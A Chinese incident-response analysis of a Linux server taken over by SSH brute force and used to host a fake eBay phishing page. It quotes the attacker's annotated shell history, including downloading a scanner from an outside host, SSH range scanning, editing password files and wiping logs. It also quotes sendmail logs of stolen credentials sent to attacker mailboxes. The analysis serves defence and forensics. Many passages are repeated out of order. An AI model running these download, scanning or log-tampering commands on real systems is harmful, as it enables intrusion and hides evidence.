一次网络钓鱼后台的应急分析
2024-04-17 22:03:52
网络钓鱼在我处理的过程中,遇见过4次,而每次的***手法和工具都几乎一摸一样,可以想象这是一个高度合作的***团伙。
接到客户应急电话,迅速赶到IDC机房,以下是分析过程。
1. ***过程如下:
通过系统服务漏洞***成功――登陆系统――安装配置httpd――下载ebay伪造网络钓鱼页面文件――成功获取用户帐号和密码,并用sendmail发送到***者邮箱。
2. 结果分析
基本过程:
暴力破解ssh成功――登陆系统――安装配置rootkit和backdoor――下载ebay伪造网络钓鱼页面文件――成功获取用户帐号和密码,并用sendmail发送到***者邮箱――扫瞄其它机器端口和猜测其它机器密码。
此机器10月29日被***,根据手法和目的,应该是一个***组所为,以前已经发现过类似事件,此机被安装rootkit和后门,不可信任了,建议备份数据后,重新安装系统.
***时间段:
10月29日09:21:33成功破解
10月29日09:24登陆系统
11月5日 安装rootkit和backdoor 扫描软件
Rootkit替换了ps ls top netstat
Backdoor /usr/bin/ smbd –D
扫描软件/.scan /var/tmp /var/tmp/.mr004 /usr/lib/.cgi-bin,
11月5日 17:30:41 开始***其他机器,扫瞄其它机器端口和猜测其它机器密码
2.1 系统检查可疑文件
留下backdoor和rootkit和多个***工具
/usr/lib/.cgi-bin,***工具
/var/tmp/.mr004***工具
/.scan ***工具
/home/home***工具
/home/m.log ip记录
games /usr/games***工具
/var/tmp ***工具
/tmp/screens***工具
/usr/bin/ smbd -D目录下,后门进程,不能用ps查看,可用pstree和lsof看到
file /usr/bin/smbd\ -D
/usr/bin/smbd -D: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.0.0, dynamically linked (uses shared libs), not stripped
通过系统服务漏洞***成功――登陆系统――安装配置httpd――下载ebay伪造网络钓鱼页面文件――成功获取用户帐号和密码,并用sendmail发送到***者邮箱。
2. 结果分析
基本过程:
暴力破解ssh成功――登陆系统――安装配置rootkit和backdoor――下载ebay伪造网络钓鱼页面文件――成功获取用户帐号和密码,并用sendmail发送到***者邮箱――扫瞄其它机器端口和猜测其它机器密码。
此机器10月29日被***,根据手法和目的,应该是一个***组所为,以前已经发现过类似事件,此机被安装rootkit和后门,不可信任了,建议备份数据后,重新安装系统.
***时间段:
10月29日09:21:33成功破解
10月29日09:24登陆系统
11月5日 安装rootkit和backdoor 扫描软件
Rootkit替换了ps ls top netstat
Backdoor /usr/bin/ smbd –D
扫描软件/.scan /var/tmp /var/tmp/.mr004 /usr/lib/.cgi-bin,
11月5日 17:30:41 开始***其他机器,扫瞄其它机器端口和猜测其它机器密码
2.1 系统检查可疑文件
留下backdoor和rootkit和多个***工具
/usr/lib/.cgi-bin,***工具
/var/tmp/.mr004***工具
/.scan ***工具
/home/home***工具
/home/m.log ip记录
games /usr/games***工具
/var/tmp ***工具
/tmp/screens***工具
/usr/bin/ smbd -D目录下,后门进程,不能用ps查看,可用pstree和lsof看到
file /usr/bin/smbd\ -D
/usr/bin/smbd -D: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.0.0, dynamically linked (uses shared libs), not stripped
用ps –ef看不到系统真实信息,进程被篡改
2.2 日志分析
为了显示效果,红色标记的为分析,其他为原始记录
~/.bash_history
此目录为以前建立,但history已经被删除部分
cd /usr/lib/.cgi-bin/
ls
cd .mr
cd /usr/games
建立目录
mkdir .cgi
cd .cgi/
ls
下载扫描器
wget www.tomis3.us/Hacks/scan.tgz
ftp
ftp 68.142.234.89
解压并删除原文件
tar zxzvf scan.tgz ;rm -rf scan.tgz \
tar zxzvf scan.tgz ;rm -rf scan.tgz
cd .mr004/
ls
rm -rf pass_file
cd ..
mv pass_file .mr004/
cd .mr004/
ls
screen已经被删除,恶意软件
screen
cat vuln.txt
rm -rf vuln.txt
cd /var/tmp/.mr004/
cat vuln.txt
ls -la
screen -r
screen -r 4583.pts-0.Linuxbackup
screen -wipe
screen
exit
socklist
w
screen -r
history
cd .scan
ls
cd /var/tmp
cd .mr004
ls
杀死screen进程
killall -9 screen
killall -9 SCREEN
扫描,分析了x内容是根据129为参数$1,表示从129开始的地址依次扫描端口为22的目标机器
./x 129
Ls
查看扫描结果
cat vuln.txt
screen –r
继续扫207开始的地址
./x 207
pwd
cd /var/tmp/.mr004
killall -9 screen
service ssh restart
service sshd restart
service sshd reload
history
locate bios.txt
cd /home/.scan/.mr004/
ls -a
ps ax
screen -r 5180
screen -wipe
ls -a
rm -rf .mr004 .ssh-scan.swp mfu.txt bios.txt
ls -a
pico pass_file
nano pass_file
rm -rf pass_file
nano pass_file
screen
cd /usr/lib/.cgi-bin/
ls
w
sense /usr/lib/libice
cd .mr
ls
cd /usr/games/
cd .cgi/
ls
cd .mr004/
ls
cat vul
cat mfu.txt
ps –aux
查找扫描结果,傻了吧
locate mfu.txt
cd /home/.scan/.mr004/
ls
cat mfu.txt
ls
做贼心虚,经常看是否有人在线否
w
cd /usr/lib/.cgi-bin/
ls
cd .c
ls
cd .mr004/
ls
cat vuln.txt
ls
还看,唉
w
ls
有完没完
w
删除mail日志,毒
rm -rf /var/spool/mail/root
ls
cd ..
ls
胆小的***
w
rm -rf .mr004/
下载***工具,开始已经下了,估计又找不到了,重下
wget www.tomis3.us/Hacks/scan.tgz
ftp
rm -rf .mr
tar zxzvf scan.tgz ;rm -rf scan.tgz
cd .mr004/
l
cd .mr004
ls
扫描210段的ssh
./x 210
W
扫描194段的ssh
为了显示效果,红色标记的为分析,其他为原始记录
~/.bash_history
此目录为以前建立,但history已经被删除部分
cd /usr/lib/.cgi-bin/
ls
cd .mr
cd /usr/games
建立目录
mkdir .cgi
cd .cgi/
ls
下载扫描器
wget www.tomis3.us/Hacks/scan.tgz
ftp
ftp 68.142.234.89
解压并删除原文件
tar zxzvf scan.tgz ;rm -rf scan.tgz \
tar zxzvf scan.tgz ;rm -rf scan.tgz
cd .mr004/
ls
rm -rf pass_file
cd ..
mv pass_file .mr004/
cd .mr004/
ls
screen已经被删除,恶意软件
screen
cat vuln.txt
rm -rf vuln.txt
cd /var/tmp/.mr004/
cat vuln.txt
ls -la
screen -r
screen -r 4583.pts-0.Linuxbackup
screen -wipe
screen
exit
socklist
w
screen -r
history
cd .scan
ls
cd /var/tmp
cd .mr004
ls
杀死screen进程
killall -9 screen
killall -9 SCREEN
扫描,分析了x内容是根据129为参数$1,表示从129开始的地址依次扫描端口为22的目标机器
./x 129
Ls
查看扫描结果
cat vuln.txt
screen –r
继续扫207开始的地址
./x 207
pwd
cd /var/tmp/.mr004
killall -9 screen
service ssh restart
service sshd restart
service sshd reload
history
locate bios.txt
cd /home/.scan/.mr004/
ls -a
ps ax
screen -r 5180
screen -wipe
ls -a
rm -rf .mr004 .ssh-scan.swp mfu.txt bios.txt
ls -a
pico pass_file
nano pass_file
rm -rf pass_file
nano pass_file
screen
cd /usr/lib/.cgi-bin/
ls
w
sense /usr/lib/libice
cd .mr
ls
cd /usr/games/
cd .cgi/
ls
cd .mr004/
ls
cat vul
cat mfu.txt
ps –aux
查找扫描结果,傻了吧
locate mfu.txt
cd /home/.scan/.mr004/
ls
cat mfu.txt
ls
做贼心虚,经常看是否有人在线否
w
cd /usr/lib/.cgi-bin/
ls
cd .c
ls
cd .mr004/
ls
cat vuln.txt
ls
还看,唉
w
ls
有完没完
w
删除mail日志,毒
rm -rf /var/spool/mail/root
ls
cd ..
ls
胆小的***
w
rm -rf .mr004/
下载***工具,开始已经下了,估计又找不到了,重下
wget www.tomis3.us/Hacks/scan.tgz
ftp
rm -rf .mr
tar zxzvf scan.tgz ;rm -rf scan.tgz
cd .mr004/
l
cd .mr004
ls
扫描210段的ssh
./x 210
W
扫描194段的ssh
./x 194
ls
rm -rf mfu.txt
rm -rf bios.txt
扫描205段的ssh
ls
rm -rf mfu.txt
rm -rf bios.txt
扫描205段的ssh
./x 205
w
history
cd /home/.scan/.mr004/
ls
screen
screen -r
w
查看进程
ps aux
然后重启
reboot
cd /usr/games/
cd .mr
ls
cd .cgi
cd .mr004/
cat vul
ls
ps -aux
cd /home/.scan/
ls
cd .mr004/
ls
查看自己的痕迹
history
killall -9 screen
cd /usr/games/.cgi
ls
cd .mr004/
ls
cat pass_file
screen
继续扫61段
./x 61
w
ps aux
cd .scan
ls -a
cd .ssh
ls
cd ..
cd /tmp
ls -a
cd screens
ls
cd S-root
ls
cd ..
ls
history
cd /home/.scan/.mr004/
ls
./x 71
cd /etc
ls
pwd
修改了口令档案
vi passwd
vi shadow
看磁盘空间
df –k
下面大量查看进程和端口行为
ps -ef
ps -ef
more /etc/shadow
sync
sync
sync
reboot
ps -ef
last -2-
last -20
ps -ef
which ps
ls -l /bin/ps
top
ls
lsof -a
lsof
lsof |more
lsof |more
ls
lsof |more
1586 daemon mem REG 8,1 1563240 160325 /lib/tls/libc-2.3.2.so
ls
lsof -l | more
lsof -l | more
cd /dev/initctl
env
LANG=C
export
lsof -l | more
cd /dev
cd initctl
ls -ln initctl
more initctl
netstat -an
netstat -an
ps -ef
last
lsof
lsof -l | more
migration
ps -ef
lsof -l | more
cd /
./migration
ls -a
find / -name migration
netstat -an
netstat -an | more
netstat -an | more
lsof -l | more
ls
lsof
看登录日志
last
reboot
last
date
cd /var
ls
cd log
ls
ls -ln lastlog
date
修改lastlog权限并删除部分内容
chmod 777 lastlog
ls -ln
ls -ln lastlog
more lastlog
!
ls
vi lastlog
cd /etc
ls
vi hosts.allow
ls
last
su – goldensai
last
last
修改了这个,已经不可信了
vi hosts.allow
ls
ls
last
netstat -an
ps -ef
cd /etc
vi hosts.allow
ls
ls
ls
lsof | more
lsof
last
cd /var/log
ls
more messages
ls
查看日志
tail messages
ls
last
cd /etc
查看允许登录ip列表的文件
more hosts.allow
last
cd /var
;s
ls
cd log
ls
tail messages
ls
ls -ln
more xferlog
cd /home/home
ls
ls -ln
ls -l
pw
pwd
cd ..
ls
pwd
cd ..
ls
cd home
ls
cd home
ls
解压rootkit文件
tar -xvf rk.tar
ls -ln
cd red
ls
cd crontabs
LANG=C
export LANG
LS
Ls
查看计划任务
more crontabs
ls
ls -l
pwd
cd ..
ls
这个***水平不咋样,碰到zip文件就傻了,不会解压了
tar mail.zip
tar -xvf mail.zip
ls
重于解压了
unzip mail.zip
ls
ls
ls
ls -ln
ls -ln
pwd
pwd
pwd
cd ..
ls
ls
cd /v
ar
ls
cd log
ls’
ls
tail xferlog
tail -50 xferlog
ls
tail messages
tail -50 messages
ls
cd /home/home
ls
ls -ln
ps -ef | more
uname -a
lsof | more
last | more
cd /var
ls
cd log
ls
ls -l
ls -l messages*
唉,肯定删除了内容,重要的被抹去了
vi messages.1
tail messages.1
ls
vi messages
netstat -na | more
lsof -i : 23
lsof -i :23
lsof -i :111
more /etc/hosts.allow
more /etc/hosts.deny
vi /etc/hosts.deny
ps -ef | more
到收尾阶段了,不停查看日志和进程信息
lsof | more
netstat -na | more
lsof -i :1011
last | more
last | more
cd /var
ls
cd log
ls
more lastlog
ls
more secure
ls
修改了secure和messages日志
vi secure
ls
vi messages
lsof | more
ps -ef | grep vsftpd
find / -name vsftpd
ls -l /usr/sbin/vsftpd
man vsftpd
lsof -i :21
ps -ef | grep smbd
man smbd
ps -ef | grep cupsd
ps -ef
ps
man ps
ps -e
ps -A
ps -er
ps -A
ps -d
ps -e
lsof | more
cd /etc
ls
ls rc*.d
cd rc2.d
ls
clear
ls -l S*
clear
ls S*
ls
cd ..
ls
cd xinetd.conf
more xinetd.conf
ls
cd xinetd.d
ls
ls -l
more krb5-telnet
ls
cd ..
cd rc0.d
ls S*
cd ..
cd rc1.d
ls S*
ls -l
clear
ls -l S*
cd ..
cd rc2.d
ls -l S*
cd ..
ls
cd rc3.d
ls -l S*
cd ..
ls
cd rc4.d
ls -l S*
cd ..
man find
查找所有指定时间内修改了的文件
find rc*.d -c -30
man find
find rc*.d -ctime -15
find rc*.d -ctime -30
find / -ctime -15
clear
ls
cd /home
ls
find /usr -ctime -15 > m.log
more m.log
ls -l /usr/bin/socklist
ls -l /usr/games/.cgi/.mr004/x
ls -ld /usr/games
ls -ld /usr/lib/.cgi-bin
man socklist
ls -l /usr/include/iceseed.h
more /usr/include/iceseed.h
more m.log
ls -l /usr/include/icepid.h
more /usr/include/icepid.h
ls -ld /usr/games
cd /usr/games/.cgi
ls
ls -a
cd .mr004
ls
more gen-pass.sh
ls
more pass_file
ls
ls -l psscan2
ls -l ssh-scan
more ssh-scan
ps -ef | grep ssh-scan
pwd
ls
ls SS
ls X
ls a
more a
ls
more bios.txt
ls
w
history
cd /home/.scan/.mr004/
ls
screen
screen -r
w
查看进程
ps aux
然后重启
reboot
cd /usr/games/
cd .mr
ls
cd .cgi
cd .mr004/
cat vul
ls
ps -aux
cd /home/.scan/
ls
cd .mr004/
ls
查看自己的痕迹
history
killall -9 screen
cd /usr/games/.cgi
ls
cd .mr004/
ls
cat pass_file
screen
继续扫61段
./x 61
w
ps aux
cd .scan
ls -a
cd .ssh
ls
cd ..
cd /tmp
ls -a
cd screens
ls
cd S-root
ls
cd ..
ls
history
cd /home/.scan/.mr004/
ls
./x 71
cd /etc
ls
pwd
修改了口令档案
vi passwd
vi shadow
看磁盘空间
df –k
下面大量查看进程和端口行为
ps -ef
ps -ef
more /etc/shadow
sync
sync
sync
reboot
ps -ef
last -2-
last -20
ps -ef
which ps
ls -l /bin/ps
top
ls
lsof -a
lsof
lsof |more
lsof |more
ls
lsof |more
1586 daemon mem REG 8,1 1563240 160325 /lib/tls/libc-2.3.2.so
ls
lsof -l | more
lsof -l | more
cd /dev/initctl
env
LANG=C
export
lsof -l | more
cd /dev
cd initctl
ls -ln initctl
more initctl
netstat -an
netstat -an
ps -ef
last
lsof
lsof -l | more
migration
ps -ef
lsof -l | more
cd /
./migration
ls -a
find / -name migration
netstat -an
netstat -an | more
netstat -an | more
lsof -l | more
ls
lsof
看登录日志
last
reboot
last
date
cd /var
ls
cd log
ls
ls -ln lastlog
date
修改lastlog权限并删除部分内容
chmod 777 lastlog
ls -ln
ls -ln lastlog
more lastlog
!
ls
vi lastlog
cd /etc
ls
vi hosts.allow
ls
last
su – goldensai
last
last
修改了这个,已经不可信了
vi hosts.allow
ls
ls
last
netstat -an
ps -ef
cd /etc
vi hosts.allow
ls
ls
ls
lsof | more
lsof
last
cd /var/log
ls
more messages
ls
查看日志
tail messages
ls
last
cd /etc
查看允许登录ip列表的文件
more hosts.allow
last
cd /var
;s
ls
cd log
ls
tail messages
ls
ls -ln
more xferlog
cd /home/home
ls
ls -ln
ls -l
pw
pwd
cd ..
ls
pwd
cd ..
ls
cd home
ls
cd home
ls
解压rootkit文件
tar -xvf rk.tar
ls -ln
cd red
ls
cd crontabs
LANG=C
export LANG
LS
Ls
查看计划任务
more crontabs
ls
ls -l
pwd
cd ..
ls
这个***水平不咋样,碰到zip文件就傻了,不会解压了
tar mail.zip
tar -xvf mail.zip
ls
重于解压了
unzip mail.zip
ls
ls
ls
ls -ln
ls -ln
pwd
pwd
pwd
cd ..
ls
ls
cd /v
ar
ls
cd log
ls’
ls
tail xferlog
tail -50 xferlog
ls
tail messages
tail -50 messages
ls
cd /home/home
ls
ls -ln
ps -ef | more
uname -a
lsof | more
last | more
cd /var
ls
cd log
ls
ls -l
ls -l messages*
唉,肯定删除了内容,重要的被抹去了
vi messages.1
tail messages.1
ls
vi messages
netstat -na | more
lsof -i : 23
lsof -i :23
lsof -i :111
more /etc/hosts.allow
more /etc/hosts.deny
vi /etc/hosts.deny
ps -ef | more
到收尾阶段了,不停查看日志和进程信息
lsof | more
netstat -na | more
lsof -i :1011
last | more
last | more
cd /var
ls
cd log
ls
more lastlog
ls
more secure
ls
修改了secure和messages日志
vi secure
ls
vi messages
lsof | more
ps -ef | grep vsftpd
find / -name vsftpd
ls -l /usr/sbin/vsftpd
man vsftpd
lsof -i :21
ps -ef | grep smbd
man smbd
ps -ef | grep cupsd
ps -ef
ps
man ps
ps -e
ps -A
ps -er
ps -A
ps -d
ps -e
lsof | more
cd /etc
ls
ls rc*.d
cd rc2.d
ls
clear
ls -l S*
clear
ls S*
ls
cd ..
ls
cd xinetd.conf
more xinetd.conf
ls
cd xinetd.d
ls
ls -l
more krb5-telnet
ls
cd ..
cd rc0.d
ls S*
cd ..
cd rc1.d
ls S*
ls -l
clear
ls -l S*
cd ..
cd rc2.d
ls -l S*
cd ..
ls
cd rc3.d
ls -l S*
cd ..
ls
cd rc4.d
ls -l S*
cd ..
man find
查找所有指定时间内修改了的文件
find rc*.d -c -30
man find
find rc*.d -ctime -15
find rc*.d -ctime -30
find / -ctime -15
clear
ls
cd /home
ls
find /usr -ctime -15 > m.log
more m.log
ls -l /usr/bin/socklist
ls -l /usr/games/.cgi/.mr004/x
ls -ld /usr/games
ls -ld /usr/lib/.cgi-bin
man socklist
ls -l /usr/include/iceseed.h
more /usr/include/iceseed.h
more m.log
ls -l /usr/include/icepid.h
more /usr/include/icepid.h
ls -ld /usr/games
cd /usr/games/.cgi
ls
ls -a
cd .mr004
ls
more gen-pass.sh
ls
more pass_file
ls
ls -l psscan2
ls -l ssh-scan
more ssh-scan
ps -ef | grep ssh-scan
pwd
ls
ls SS
ls X
ls a
more a
ls
more bios.txt
ls
Secure.2和message.4
中的日志中有大量远程暴力破解ssh telnet用户和口令的记载,ip来自不同的地方
Oct 24 00:50:14 Linuxbackup sshd[1691]: Failed password for illegal user toor from 219.254.35.71 port 33558 ssh2
中的日志中有大量远程暴力破解ssh telnet用户和口令的记载,ip来自不同的地方
Oct 24 00:50:14 Linuxbackup sshd[1691]: Failed password for illegal user toor from 219.254.35.71 port 33558 ssh2
Oct 24 00:50:18 Linuxbackup sshd[1693]: Illegal user user from 219.254.35.71
Oct 24 00:50:20 Linuxbackup sshd[1693]: Failed password for illegal user user from 219.254.35.71 port 34522 ssh2
Oct 24 00:50:22 Linuxbackup sshd[1695]: Illegal user user from 219.254.35.71
Oct 29 13:56:22 Linuxbackup xinetd[1462]: START: telnet pid=1863 from=219.130.167.11
Oct 24 00:50:20 Linuxbackup sshd[1693]: Failed password for illegal user user from 219.254.35.71 port 34522 ssh2
Oct 24 00:50:22 Linuxbackup sshd[1695]: Illegal user user from 219.254.35.71
Oct 29 13:56:22 Linuxbackup xinetd[1462]: START: telnet pid=1863 from=219.130.167.11
Messages.2
错误日志,发送错误的ICMP类型为11,并通过网卡eth0广播出去
Oct 23 04:06:43 Linuxbackup kernel: 61.144.56.34 sent an invalid ICMP type 11, code 1 error to a broadcast: 0.0.0.0 on eth0
错误日志,发送错误的ICMP类型为11,并通过网卡eth0广播出去
Oct 23 04:06:43 Linuxbackup kernel: 61.144.56.34 sent an invalid ICMP type 11, code 1 error to a broadcast: 0.0.0.0 on eth0
10月23日来自美国的ip成功通过后门连接进来
Oct 23 16:51:52 Linuxbackup smbd -D[31033]: log: Connection from 85.186.209.59 port 1172
这析地址也都成功登录本机器
IP : 61.129.78.101
地址: 上海市浦东新区 ADSL
IP : 218.5.5.3
地址: 福建省福州市 福建政法管理干部学院
IP : 205.234.137.241
地址: 美国/加拿大 CZ88.NET
Access.log.2
有如下可疑访问,证明访问者访问了假的ebay登录页面,***制造假的Investigation页面和校验账号页面在/var/www/html/.eBay下,让ebay用户登录,从而获取账户信息
212.93.137.44 – - [28/Oct/2005:04:12:21 +0800] "GET /icons/unknown.gif HTTP/1.0" 200 245 "http://61.144.56.34/.eBay/eBayISAPI.dll.SignIn/.eBay_Account_Investigation/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.93.137.44 – - [28/Oct/2005:04:28:51 +0800] "GET /.eBay/eBayISAPI.dll.SignIn/.eBay_Account_Investigation/eBay_com%20Verify%20your%20eBay%20account_files/cobrand_determine.js HTTP/1.0" 304 – "http://61.144.56.34/.eBay/eBayISAPI.dll.SignIn/.eBay_Account_Investigation/eBay_com%20Verify%20your%20eBay%20account.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
Oct 23 16:51:52 Linuxbackup smbd -D[31033]: log: Connection from 85.186.209.59 port 1172
这析地址也都成功登录本机器
IP : 61.129.78.101
地址: 上海市浦东新区 ADSL
IP : 218.5.5.3
地址: 福建省福州市 福建政法管理干部学院
IP : 205.234.137.241
地址: 美国/加拿大 CZ88.NET
Access.log.2
有如下可疑访问,证明访问者访问了假的ebay登录页面,***制造假的Investigation页面和校验账号页面在/var/www/html/.eBay下,让ebay用户登录,从而获取账户信息
212.93.137.44 – - [28/Oct/2005:04:12:21 +0800] "GET /icons/unknown.gif HTTP/1.0" 200 245 "http://61.144.56.34/.eBay/eBayISAPI.dll.SignIn/.eBay_Account_Investigation/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.93.137.44 – - [28/Oct/2005:04:28:51 +0800] "GET /.eBay/eBayISAPI.dll.SignIn/.eBay_Account_Investigation/eBay_com%20Verify%20your%20eBay%20account_files/cobrand_determine.js HTTP/1.0" 304 – "http://61.144.56.34/.eBay/eBayISAPI.dll.SignIn/.eBay_Account_Investigation/eBay_com%20Verify%20your%20eBay%20account.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
Maillog.2
被诱骗到的口令文件通过sendmail发送到 capdemagar@yahoo.com sanuciordesti@yahoo.com multecarti@yahoo.com cr3ativexxl@yahoo.com multew@4x.ro多个邮箱地址
被诱骗到的口令文件通过sendmail发送到 capdemagar@yahoo.com sanuciordesti@yahoo.com multecarti@yahoo.com cr3ativexxl@yahoo.com multew@4x.ro多个邮箱地址
Oct 28 04:14:59 Linuxbackup sendmail[29986]: j9RKExXt029986: to=antrax<sanuciordesti@yahoo.com>, delay=00:00:00, mailer=esmtp, pri=30117, dsn=4.4.3, stat=queued
Oct 28 04:17:03 Linuxbackup sendmail[29988]: j9RKH3Sd029988: to=antrax<capdemagar@yahoo.com>, delay=00:00:00, mailer=esmtp, pri=30326, dsn=4.4.3, stat=queued
Oct 29 13:05:50 Linuxbackup sendmail[1856]: j9T55oLr001856: from=root, size=1960, class=0, nrcpts=1, msgid=<200510290505.j9T55oLr001856@localhost.localdomain>, relay=root@localhost
Oct 29 13:05:50 Linuxbackup sendmail[1856]: j9T55oLr001856: to=multecarti@yahoo.com, delay=00:00:00, mailer=esmtp, pri=31960, dsn=4.4.3, stat=queued
Oct 17 23:03:09 Linuxbackup sendmail[12283]: j9HF398d012283: to=cr3ativexxl@yahoo.com, delay=00:00:00, mailer=esmtp, pri=31525, dsn=4.4.3, stat=queued
Oct 19 06:20:47 Linuxbackup sendmail[31147]: j9IMKlTN031147: from=root, size=3346, class=0, nrcpts=1, msgid=<200510182220.j9IMKlTN031147@localhost.localdomain>, relay=root@localhost
Oct 19 06:20:47 Linuxbackup sendmail[31147]: j9IMKlTN031147: to=multew@4x.ro, delay=00:00:00, mailer=esmtp, pri=33346, dsn=4.4.3, stat=queued
Oct 28 04:17:03 Linuxbackup sendmail[29988]: j9RKH3Sd029988: to=antrax<capdemagar@yahoo.com>, delay=00:00:00, mailer=esmtp, pri=30326, dsn=4.4.3, stat=queued
Oct 29 13:05:50 Linuxbackup sendmail[1856]: j9T55oLr001856: from=root, size=1960, class=0, nrcpts=1, msgid=<200510290505.j9T55oLr001856@localhost.localdomain>, relay=root@localhost
Oct 29 13:05:50 Linuxbackup sendmail[1856]: j9T55oLr001856: to=multecarti@yahoo.com, delay=00:00:00, mailer=esmtp, pri=31960, dsn=4.4.3, stat=queued
Oct 17 23:03:09 Linuxbackup sendmail[12283]: j9HF398d012283: to=cr3ativexxl@yahoo.com, delay=00:00:00, mailer=esmtp, pri=31525, dsn=4.4.3, stat=queued
Oct 19 06:20:47 Linuxbackup sendmail[31147]: j9IMKlTN031147: from=root, size=3346, class=0, nrcpts=1, msgid=<200510182220.j9IMKlTN031147@localhost.localdomain>, relay=root@localhost
Oct 19 06:20:47 Linuxbackup sendmail[31147]: j9IMKlTN031147: to=multew@4x.ro, delay=00:00:00, mailer=esmtp, pri=33346, dsn=4.4.3, stat=queued
网络钓鱼***的一些特点:
1 大规模扫描有漏洞的主机
2 批扫描工具
3 攻陷有漏洞的主机
4 个人PC主机
5 架设钓鱼网站
6 前台假冒网站:知名的金融机构、在线电子商务网站
7 后台脚本:收集、验证用户输入,并通过某种渠道转发给钓鱼者
它的***目标只有一个:获取个人敏感信息(信用卡帐号密码等)
1 大规模扫描有漏洞的主机
2 批扫描工具
3 攻陷有漏洞的主机
4 个人PC主机
5 架设钓鱼网站
6 前台假冒网站:知名的金融机构、在线电子商务网站
7 后台脚本:收集、验证用户输入,并通过某种渠道转发给钓鱼者
它的***目标只有一个:获取个人敏感信息(信用卡帐号密码等)
伪装架设知名金融机构及商务网站进行欺骗用户
并且会发送大量欺骗性垃圾邮件到各个用户
所以现在的***已经从原来单纯的技术研究和破坏转入到经济利益为目的的***了,而且加强了***的合作化和批量自动化。
并且会发送大量欺骗性垃圾邮件到各个用户
所以现在的***已经从原来单纯的技术研究和破坏转入到经济利益为目的的***了,而且加强了***的合作化和批量自动化。
转载于:https://blog.51cto.com/bami8/287617
一次网络钓鱼后台的应急分析相关推荐
- 分析网络钓鱼的原理及防御措施
IE7浏览器开始加入反钓鱼功能,这个功能成为浏览器安全功能的一个选项 – 仿冒网站筛选器.各类IM软件,如QQ等开始出现提示用户防止被网络钓鱼的安全信息.电子商务.门户.SNS.BLOG等大部分Web ...
- 网络钓鱼攻击技术分析及防范
网络钓鱼攻击技术分析及防范 网络钓鱼攻击技术分析及防范 Author: rayh4c [80sec] EMail: rayh4c#80sec.com Site: http://www.80sec.co ...
- html的页面中嵌入额外的内容,通过Wireshark分析网络钓鱼
8种机械键盘轴体对比 本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选? 实验目的通过学习wireshark分析网络钓鱼 实验工具wireshark:Beyond Compare是一个网络封包分 ...
- 2020年第三季度的垃圾邮件和网络钓鱼攻击分析
垃圾邮件和网络钓鱼攻击的花样百出 如今,许多公司通过在线平台发布营销新闻,在功能方面,此类平台的功能非常多样化:它们发出广告和信息性消息.收集统计数据(例如,有关电子邮件中点击的链接的信息)等.与此同 ...
- 实例解析网络钓鱼攻击的幕后
实例解析网络钓鱼攻击的幕后 网络钓鱼是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件,意图引诱收信人给出敏感信息(如用户名.口令.帐号ID.ATM PIN码或信用卡详细信息)的一种攻击方式. ...
- 钓鱼基础设施的应用分析(钓鱼邮件利用、Gophish)
钓鱼常用字符替换集 0x00 前言 邮件钓鱼攻击是一种常见的网络攻击方法,无论是广撒网式的"大海捞鱼",还是极具精准化.定制化的鱼叉式钓鱼,都越来越普遍. 在红蓝模拟对抗的场景下, ...
- 人心惶惶:利用新西兰特大枪击案进行网络钓鱼攻击的前因后果
日前在新西兰克赖斯特彻奇市制造了特大枪击案的澳大利亚男子布兰顿-塔兰特在被捕之后做出了又一项引人注目的决定: 他宣布开除法庭为其配备的辩护律师,表示将在出庭时自行答辩 专家分析称,实际上这并不意外,在 ...
- 怕上当?来看这份网络钓鱼和诈骗技术趋势
网络钓鱼和诈骗:当前的欺诈类型 网络钓鱼 钓鱼者可以攻击任何在线服务--银行.社交网络.政府门户网站.在线商店.邮件服务.快递公司等--中的证书.但是,顶级品牌的客户往往面临更大风险,因为相比小品牌, ...
- DKIM标准:对付网络钓鱼的新武器
[计世网 独家]进行电子邮件欺诈.发送垃圾邮件及从事网络钓鱼的人要当心了,目前出现了一件新武器--域名密钥识别邮件标准(DKIM),它让企业可通过密码对进出站的电子邮件进行 签名,证实所发送邮件的真实 ...
最新文章
- HDU 6156 Palindrome Function 数位DP
- 0403互联网新闻 | 哔哩哔哩上线电商类小程序;翼鸥教育和腾讯云联合发布ClassIn Cloud...
- Python之递归函数
- QT清空文件夹内所有文件
- 解决idea的.gitignore有时不起作用的问题
- android 如何启动nfc卡模拟模式_用手机模拟小区业主卡,出入更加便捷,免去带卡的烦恼,(限安卓)...
- WPS Office.10.1.0.6445绿色免安装版下载
- 51单片机——实现呼吸灯程序代码
- [样本分析] 海莲花CS样本
- 【视频目标检测】|Towards High Performance Video Object Detection
- 挂名公司法人、董事、监事、高管的风险
- Docker常用配置管理操作札记整理
- 如火般的风马: 快速迁移本地项目到Bluemix云平台
- Apk 拆包替换文件
- JAVA异常记录(ORA-56900:pivot|unpivot 操作内不支持绑定变量)
- 计算机审计试题及答案,计算机审计练习题及答案
- 3、nginx设置简单的代理服务器-阅读官方文档
- 湖北二本计算机大学录取分数线,湖北二本投档分数线
- 使用ltp进行三元组提取的实战代码
- Struts2框架之Action详解